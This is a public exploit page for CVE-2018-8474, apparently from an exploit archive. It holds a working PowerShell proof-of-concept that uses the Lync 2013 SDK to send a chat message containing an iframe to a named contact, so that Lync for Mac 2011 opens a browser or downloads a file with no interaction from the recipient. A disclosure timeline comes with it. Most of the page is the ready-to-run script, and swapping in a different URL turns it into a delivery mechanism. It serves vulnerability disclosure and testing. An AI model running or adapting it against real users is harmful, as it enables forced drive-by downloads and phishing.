扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download # Author: @nyxgeek - TrustedSec # Date: 2018-03-20 # Vendor Homepage: microsoft.com # Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517 # CVE: CVE-2018-8474 # Version: Lync:Mac 2011 14.4.3, likely earlier versions # Tested on: Lync:Mac 2011 14.4.3 (170308) # Description: # Force browsing or download via embedded iframe in a chat window. No user # interaction required. When the iframe contains a web site URL, a new browser # window of the default browser will open with the URL. # If the URL is a file, it will download it automatically if it is a permitted # file type (e.g., zip) # Awrite-up can be found at: # https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/ # Requirements: Originating machine needs Lync 2013 SDK installed # (https://www.microsoft.com/en-us/download/details.aspx?id=36824) # Timeline of Disclosure: # # 07/18/2017 - Reported issue to Microsoft # 11/22/2017 - Microsoft has reproduced problem # 03/07/2018 - Microsoft replies that they have decided not to fix, but gave #their blessing for disclosure #target user $target = "user@domain" $message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>" if (-not (Get-Module -Name Microsoft.Lync.Model)) { try { # you may need to change the location of this DLL Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop } catch { Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824" } } # Connect to the local Skype process try { $client = [Microsoft.Lync.Model.LyncClient]::GetClient() } catch { Write-Host "<code>nYou need to have Skype open and signed in first" break } #Start Conversation $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]" #Add the Message $msg.Add(1,$message) # Add the contact URI try { $contact = $client.ContactManager.GetContactByUri($target) } catch { Write-Host "</code>nFailed to lookup Contact"$target break } # Create a conversation $convo = $client.ConversationManager.AddConversation() $convo.AddParticipant($contact) | Out-Null # Set the message mode as IM $imModality = $convo.Modalities[1] # Send the message $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null # End the Convo to suppress the UI $convo.End() | Out-Null Write-Host "Sent the following message to "$target":`n"$message |
体验盒子
